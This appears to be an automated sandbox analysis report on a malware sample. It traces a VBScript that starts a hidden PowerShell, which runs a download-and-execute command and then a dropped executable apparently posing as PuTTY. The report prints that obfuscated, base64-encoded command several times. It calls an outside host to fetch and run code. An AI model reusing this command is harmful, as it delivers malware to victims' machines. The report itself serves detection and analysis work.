Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov edi, edx | 4_2_00CA9090 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then add edi, 01h | 4_2_00C57150 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then cmp dword ptr [ecx], eax | 4_2_00C70100 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then cmp dword ptr [ecx], eax | 4_2_00C70100 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov eax, dword ptr [edi+ebp*4+04h] | 4_2_00C63130 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov ecx, edx | 4_2_00C7B280 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then cmp byte ptr [edi+ebx], 0000002Ch | 4_2_00C8D200 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov ecx, dword ptr [eax-08h] | 4_2_00C65230 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov ecx, dword ptr [esp+eax*8] | 4_2_00CCD4E0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then push ebx | 4_2_00C73470 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov eax, dword ptr [esi+1Ch] | 4_2_00C7F550 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then movzx ebp, byte ptr [edi] | 4_2_00CAA6D0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then push ecx | 4_2_00C78670 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then push dword ptr [edi+10h] | 4_2_00CA3790 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov byte ptr [eax+esi*4+07h], 00000004h | 4_2_00C448D7 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov esi, 00000000h | 4_2_00CAF850 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov edi, dword ptr [ecx+18h] | 4_2_00C4F9B0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov esi, 00000000h | 4_2_00CAF970 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then push 00000001h | 4_2_00C8CA90 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then sub edx, 01h | 4_2_00C5AA50 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov eax, dword ptr [00D41768h] | 4_2_00C45B50 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then movzx eax, byte ptr [ebp+edi+01h] | 4_2_00C7CB00 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov ecx, esi | 4_2_00C4FCD0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then movzx eax, cl | 4_2_00C7DC40 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4x nop then mov eax, dword ptr [edi+ebx*4+04h] | 4_2_00C61F80 |
Source: powershell.exe, 00000003.00000002.944407584.0000015650BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.000001565092A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650BEE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://communicalink.com |
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://communicalink.com/index.php |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04 |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: OgUpjXaY.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y |
Source: OgUpjXaY.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t |
Source: OgUpjXaY.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# |
Source: OgUpjXaY.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# |
Source: powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://ocsp.comodoca.com0 |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: http://ocsp.sectigo.com0 |
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.944407584.0000015650C6A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://the.earth.li |
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.944407584.000001564F5F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.944407584.0000015651055000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.944407584.000001564F81D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.944407584.000001565021D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.958131745.000001565F79E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.958131745.000001565F65B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: https://sectigo.com/CPS0 |
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li |
Source: powershell.exe, 00000003.00000002.944407584.0000015650C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li( |
Source: powershell.exe, 00000003.00000002.944407584.0000015650BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe |
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe |
Source: powershell.exe, 00000003.00000002.944407584.0000015650C1C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exeX |
Source: OgUpjXaY.exe, OgUpjXaY.exe, 00000004.00000002.2130183800.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000000.901523116.0000000000D07000.00000002.00000001.01000000.00000006.sdmp, OgUpjXaY.exe, 00000004.00000003.902845541.0000000003941000.00000004.00000020.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/ |
Source: powershell.exe, 00000003.00000002.944407584.0000015650CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650C83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.944407584.0000015650CE2000.00000004.00000800.00020000.00000000.sdmp, OgUpjXaY.exe.3.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C46150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree, | 4_2_00C46150 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C47490 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA, | 4_2_00C47490 |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C52080 | 4_2_00C52080 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C60090 | 4_2_00C60090 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C4D000 | 4_2_00C4D000 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CAB180 | 4_2_00CAB180 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CE6140 | 4_2_00CE6140 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C41130 | 4_2_00C41130 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C5E280 | 4_2_00C5E280 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C7B280 | 4_2_00C7B280 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C56260 | 4_2_00C56260 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CDF3F0 | 4_2_00CDF3F0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CDB3F0 | 4_2_00CDB3F0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CAE360 | 4_2_00CAE360 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CD4330 | 4_2_00CD4330 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C47490 | 4_2_00C47490 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CA8490 | 4_2_00CA8490 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CE3417 | 4_2_00CE3417 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C52080 | 4_2_00C52080 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C7A520 | 4_2_00C7A520 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CDC530 | 4_2_00CDC530 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CAD6C0 | 4_2_00CAD6C0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CAA6D0 | 4_2_00CAA6D0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CE2644 | 4_2_00CE2644 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C607F0 | 4_2_00C607F0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CCD770 | 4_2_00CCD770 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CA98F0 | 4_2_00CA98F0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C48920 | 4_2_00C48920 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CE6A9B | 4_2_00CE6A9B |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C5AA50 | 4_2_00C5AA50 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00CA3CF0 | 4_2_00CA3CF0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C49D80 | 4_2_00C49D80 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C4FDB0 | 4_2_00C4FDB0 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C59D50 | 4_2_00C59D50 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C69D00 | 4_2_00C69D00 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C41E56 | 4_2_00C41E56 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: 4_2_00C61F80 | 4_2_00C61F80 |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C88760 appears 32 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C7EA00 appears 33 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C651E0 appears 36 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00CA88E0 appears 48 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C78880 appears 109 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C78E30 appears 38 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C73B40 appears 78 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00CEDB03 appears 386 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C88CA0 appears 39 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C73A70 appears 150 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00CA7220 appears 38 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C888B0 appears 87 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00C895A0 appears 85 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00CDEDF0 appears 44 times | |
Source: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe | Code function: String function: 00CA7210 appears 40 times | |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\client_3.vbs" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe" | |
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe "C:\Users\user\AppData\Local\Temp\OgUpjXaY.exe" | Jump to behavior |